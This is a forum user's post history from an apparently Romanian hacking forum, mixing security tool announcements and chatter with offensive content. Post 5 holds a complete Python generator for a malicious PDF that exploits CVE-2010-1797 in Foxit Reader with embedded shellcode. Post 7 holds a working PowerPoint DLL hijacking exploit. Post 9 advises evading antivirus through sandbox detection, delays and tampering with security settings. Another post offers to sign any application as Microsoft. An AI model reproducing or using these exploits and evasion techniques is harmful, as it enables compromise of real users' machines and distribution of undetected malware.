Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. begood

    Documentar APA

    Board Message PBS - Fractals: Hunting the Hidden Dimension (2010)
  2. crapa pipota in voi de ciuda, a ? urmatorul care comenteaza are ban 5 zile.
  3. ScreenShot Features: As the name suggests "Unified List Manager" attempts to incorporate mini tools in a single user friendly interface to help you manage lists, not only are tools provided to sort lists but included are analysis functions to give you detailed information about the contents of your lists. Other functions include hashing of lists, down/up sizing and trimming of lists and yes it's free. List Merger (Vertical): Can merge multiple lists into a single file List Merger (Horizontal): Can combined two lists itemwise List Splitter: Can split large lists into smaller lists by user defined items per list Cross Checker: Checks one list against another and removes items from that list if found in other Delimeter Conversion: Converts between LF/CrLF/User Defined delimeter Analysis Tools: Analyses the charsets of the list (Numbers, Symbols, Upper, Lower, Special, etc) Char Per position analysis (The occurance of a character in particular position) Pattern Analysis (Items starting/ending in numbers, number of consecutive numbers/symbols/toggles) Chaining Analysis (The occurance of two letters in an item, eg: AB, AP, bM, Oo, 9n, p0, etc) Frequency Analysis (The frequence of each item in a list) English (nouns, adjectives, verbs, isoforms, palindromes in a list) Case Tools: Converts a list to upper/lower Converts first char to upper Converts first char to upper rest to lower Case toggling All possible case mutations Charset Tools: Contains functions to parse out elements which don't fit a requirement such as: Removing/keeping items with symbols, numbers, special User defined charset Hashing of lists to: MD2, MD4, MD5, SHA-1, SHA-2 (256), RIPEMD-160, RIPEMD-320, NT Line Tools: Removal/Retain items which contain "user defined string" Prepend to each item Append to each item Misc Tools: Saves items in a list if meets length requirement Reverse items in a list Generate all character mutations, e.g: ABCD -> ACBD, DBCA, BCAD, etc Replace multiple chars per item Find and replace Slice Tools (Trims items in a list) Trims items starting/ending with numbers/symbols Trims items not ending with alpha Trim before/after position Trim before/after "user defined string" Sort tools: Sorts items into 16 lists by length Sorts alphabetically (large/small list support) Sorts items by length Download ULM 0.61 Free Rainbow Tables | Forum • View topic - ULM (Unified List Manager)
  4. nebunu68 - Vizualizare profil RstCenter Sau facut de ras, RstCenter Sau facut de ras - Forumul Softpedia banned. idioti.
  5. import sys,zlib def getFFShellcode(sc): ff_sc = '' if len(sc)%4 != 0: sc += (4-len(sc)%4)*'\x00' for i in range(0,len(sc),4): ff_sc += '\xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i] return ff_sc outputHeader = ''' ############################################################################################## # FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797) # ############################################################################################## # # # Product: Foxit Reader <= 4.0 # # Platforms: Windows XP, Windows Vista # # Author: Jose Miguel Esparza <jesparza AT eternal-todo DOT com> # # Web: http://eternal-todo.com # # Date: 2010-08-23 # # # ############################################################################################## ''' outputFileName = 'foxit_type2_poc.pdf' usage = 'Usage: '+sys.argv[0]+' target\n\nTargets:\n\t0 - Foxit Reader > 3.0\n\t1 - Foxit Reader 3.0\n\t2 - Other versions' COMEX_PDF_TEMPLATE = '''%PDF-1.3 %\xbe\xbe\xba\xba 4 0 obj << /Length 631 >> stream q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc 7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q 1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta) -0.2 ( -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4 ( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT -0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( ) -1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc 18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm /F2.0 1 Tf ( ) Tj ET Q Q endstream endobj 2 0 obj << /Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792] >> endobj 5 0 obj << /ProcSet [ /PDF /Text ] /ColorSpace << /Cs1 6 0 R >> /Font << /F2.0 8 0 R >> >> endobj 3 0 obj << /Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ] >> endobj 7 0 obj << /Type /Catalog /Pages 3 0 R >> endobj 11 0 obj << /Subtype/Type1C /Filter[/FlateDecode] /Length $CFF_STREAM_LENGTH >> stream $CFF_STREAM endstream endobj 9 0 obj << /Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32 /FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle 0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R >> endobj 10 0 obj [ 556 ] endobj 8 0 obj << /Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor 9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding >> endobj 1 0 obj << >> endobj xref 0 12 0000000000 65535 f 0000017767 00000 n 0000000408 00000 n 0000003397 00000 n 0000000022 00000 n 0000000389 00000 n 0000000512 00000 n 0000003361 00000 n 0000017359 00000 n 0000007240 00000 n 0000000622 00000 n 0000003340 00000 n trailer << /Size 12 /Root 7 0 R /Info 1 0 R >> startxref 17942 %%EOF ''' MAX_FF_SECTION_LEN = 45*5 JUMP_BYTE = ['\xcd','\xcc'] POP_POP_RET_ADDRESS = ['\x00\x40\x11\x85','\x00\x40\xce\x36'] # Foxit reader addresses, depending on the version NUM_SECOND_INSTRUCTIONS_SET = [183,182] # calc.exe shellcode shellcode = '\x68\x10\xf5\x00\x00\x31\xf6\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x18\x67\xe3\xec\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31\xc0\x99\x32\x17\x66\xc1\xca\x01\xae\x75\xf7\x58\x66\x3b\xd0\x50\xe0\xe2\x75\xcc\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b\x7b\x1c\x01\xef\x03\x2c\x97\x66\x3d\x10\xf5\x75\x0e\x33\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\xff\xd5\x68\x06\xcb\x00\x00\xeb\x92' cff_header = '\x01\x00\x04\x01\x00\x01\x01\x01\x13ABCDEF+Times-Roman\x00\x01\x01\x01\x1f\xf8\x1b\x00\xf8\x1c\x02\xf8\x1d\x03\xf8\x19\x04\x1co\x00\r\xfb<\xfbn\xfa|\xfa\x16\x05\xe9\x11\x8b\x8b\x12\x00\x03\x01\x01\x08\x13\x18001.007Times RomanTimes\x00\x00\x00\x02\x04\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x04\xdc' if len(sys.argv) > 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1: sys.exit(usage) version = int(sys.argv[1]) if version == 2: sys.exit('Versions < 3.0 are not implemented, try it!! \n') if version > 2: sys.exit(usage) print outputHeader print '[-] Creating PDF file...' # Building the FF section ff_shellcode = getFFShellcode(shellcode) ff_zero_bytes = '\xff\x00\x00\x00\x00' ff_instructions = ff_zero_bytes*11 + ff_shellcode + ((MAX_FF_SECTION_LEN - len(ff_shellcode) - 55 - 5*5)/5) * ff_zero_bytes + '\xff\x90\x90\x8a\xeb' + '\xff'+POP_POP_RET_ADDRESS[version] + ('\xff\x00'+JUMP_BYTE[version]+'\x00\x00')*3 if len(ff_instructions) > MAX_FF_SECTION_LEN: sys.exit('[x] FF section bigger than expected!!') # Operators sections first_instructions_set = '\x0c\x17\x0c\x17\x0c\x04\x0c\x1d' * 20 second_instructions_set = '\x0c\x17\x0c\x1d' * NUM_SECOND_INSTRUCTIONS_SET[version] third_instructions_set = '\x0c\x1d\x0c\x12' * 42 # Building the full CFF content for the fake charstring cff_content = cff_header + '\x0e'*4 + ff_instructions + first_instructions_set + second_instructions_set + third_instructions_set + ff_zero_bytes + '\x0e' # Decoding with FlateDecode encoded_cff_content = zlib.compress(cff_content) # Creating the PDF based on the Comex PDF, slightly modified pdf_content = COMEX_PDF_TEMPLATE pdf_content = pdf_content.replace('$CFF_STREAM_LENGTH',str(len(encoded_cff_content))) pdf_content = pdf_content.replace('$CFF_STREAM',encoded_cff_content) open(outputFileName,'w').write(pdf_content) print '[+] File "'+outputFileName+'" created, test it!!' EDB-ID: 14727 CVE: 2010-1797 OSVDB-ID: 66828 Author: Jose Miguel Esparza Published: 2010-08-24
  6. NetSecL 3.0 is a live DVD + installation based on OpenSuse. Once installed you can fully enjoy the features of GrSecurity hardened kernel and penetration tools or if you like to do some penetration testing you can directly run all tools from the live DVD. NetSecL firewall is included as always and most of the penetration tools are ported to the new platform. Security-focused distro NetSecL 3.0 released
  7. /* Exploit Title: Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll) Date: 24/08/2010 Author: TheLeader Email: gsog2009 [a7] hotmail [d0t] com Software Link: http://office.microsoft.com/en-us/powerpoint/ Version: 14.0.4760.1000 Tested on: Windows 7 x86 (6.1.7600) Compile and rename to pptimpconv.dll, create a file in the same dir with one of the following extensions: .odp / .pot / .potm / .potx / .ppa / .pps / .ppsm / .ppsx / .ppt / .pptm / .pptx / .pwz / .sldm / .sldx This exploit does _not_ get triggered with the following file extensions: .pothtml / .ppam / .ppthtml / .pptxml / .thmx Double click & watch a nice calculator pop =] *More shouts* to all the great guys at forums.hacking.org.il */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void HrCreateConverter() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }
  8. ce software + hardware ai nevoie sa spargi gsm in 30 secunde : [A51] The call of Kraken http://www.computerworld.com/s/article/9179529/New_Kraken_GSM_cracking_software_is_released?taxonomyId=15&pageNumber=1
  9. begood

    sugestii FUD

    http://rstcenter.com/forum/24235-emulation-awareness-offensisivec0ding.rst Pe scurt ideea ar fi sa detectezi daca aplicatia ta este rulata intr-un mediu virtualizat, daca da, o faci sa ruleze intr-un fel, daca nu, in modul ofensiv. Mai o chestie ar fi sa pui un delay cand este executata functia ta. La scantime poti evita in felul asta daca nu ma insel chiar toate av-urile, la runtime mai greu. Majoritatea userilor nu isi pun parola la setarile din firewall/av, folositi asta in avantajul vostru. Modificati din memorie setarile, sau pe disc.
  10. Exlade released Cryptic Disk 3.0 which allows users to create virtual encrypted disks as well as encrypt hard disks, drive partitions, USB drives and memory cards. The program's transparent (on-the-fly) encryption happens in real time and has no impact on computer performance. The new release of the disk encryption software saw an overhaul in the data encryption process: the list of algorithms was considerably expanded, and a cascade encryption method (where multiple algorithms are used sequentially in any order to encrypt data) was added to augment protection against any possible attacks from hackers. Thanks to the use of this method, encryption key size jumps from 256 to 2944 bits, which certainly boosts both encryption strength and reliability. An additional method to protect information is to create hidden encrypted disks inside of already existing ones (i.e., steganography), with up to three layers of nesting. This serves to deceive potential adversaries into thinking that no disk encryption software is present, when the opposite is in fact the case. The new version has built-in protection from brute force password attacks, as well as a virtual keyboard which serves to reliably protect user-entered passwords from keyloggers. Disk encryption software Cryptic Disk 3.0 released
  11. Re: [A51] sell rainbow tables on hdd Mobile phone security cracked !! - engleza - - Page 2 - RST http://rstcenter.com/forum/7653-interceptare-convorbire.rst A5/1
  12. In article 8 of my exploit writing series, I have introduced the concept of egg hunters, and explained what an omelet hunter is and how it works. Today, I want to share with you my own eggs-to-omelet implementation, explain how it works, and how you can use it in a standalone exploit or in a metasploit module. In case you missed article 8, I’ll start with a short recap and explain the basic concepts of egg hunters and omelet. At the same time, I would like to mention that you might have to read article 8 first before you will understand this post. This post is not a full blown tutorial, it really is just a write-up of some of my own notes and tools. And yes, I plan on doing this kind of write-ups more often. Basic concepts An egg hunter is a piece of code that is designed to look for another (mostly bigger) piece of (shell)code in memory, and execute that piece of code when it finds it. It uses a tag, (usually 4 bytes) to locate the second piece of code. Egg hunters are often used if the available space for executing shellcode is limited, and there is another (random / non-static) location in memory where you can store data. An omelet is an extension of this concept. Instead of finding one set of code and execute it, it has the ability to find multiple pieces of code, reassemble them into the original code, and execute them. more : http://www.corelan.be:8800/index.php/2010/08/22/exploit-notes-win32-eggs-to-omelet/
  13. crezi ca mai stiu unde a zis ca a intrat? imi amintesc ca era visul lui, MIT.
  14. New Age on SKY.fm
  15. iti semnez cu microsoft orice aplicatie doresti. ia vreo 5 secunde/ semnatura, happy ?
  16. Dranaxum parca a fost admis la MIT talk to him.
  17. poison ivy. warn. http://www.virustotal.com/file-scan/report.html?id=7e534ba7d707d28e6b3293b0f40789d432f702eb2aa8cdd60e55cb7ebc3b4711-1282459316 http://anubis.iseclab.org/?action=result&task_id=122d87976d875e084850ddad5b28cddcc
  18. RSMangler will take a wordlist and perform various manipulations on it similar to those done by John the Ripper with a few extras. The main new feature is permutations mode which takes each word in the list and combines it with the others to produce all possible permutations (not combinations, order matters). For example the words freds, fresh, fish will produce the following list: freds fresh fish fredsfresh fredsfish freshfreds freshfish fishfreds fishfresh fredsfreshfish fredsfishfresh freshfredsfish freshfishfreds fishfredsfresh fishfreshfreds Each of these new words is then subject to the other mangles, because of this we strongly recommend with permutations mode enabled (default) you use a very small wordlist, 3 start words create a final list containing 4245 words and 5 start words creates a list containing 91975. As a test we tried it with a few hundred words and gave up when the output file got to 3G. If you try to use a file with more than 5 words you will get a warning and the option to abort. Other mangles include adding the numbers 1 to 123 to the start and end, 01 to 09 to the start and end, various case manipulations, leet speak, word reversal, ed and ing on the end and doubling words up. The initial wordlist can either be specified as a file or can be piped in through STDIN. Preety good tool for basic system penetration testing and find fast and simple vulnerability on the system. Operating system supported RSMangler is written in Ruby and therefore needs Ruby to be installed and working. The script needs to be made executable and it doesn’t rely on any gems or anything external Download RSMangler 1.0 download
  19. begood

    Buna!

    last visit 20 august 2010 voi speriati tot ce inseamna femeie )) mai rau ca 4chan-ul, acolo macar mai sunt pizde
  20. faceti alt mirror daca exista fisierul.
  21. sa vad ca ii mai adaugi functii ca va fi mutat la loc.
  22. reclama .
  23. begood

    Buna!

    bun venit
  24. l-am mutat
×
×
  • Create New...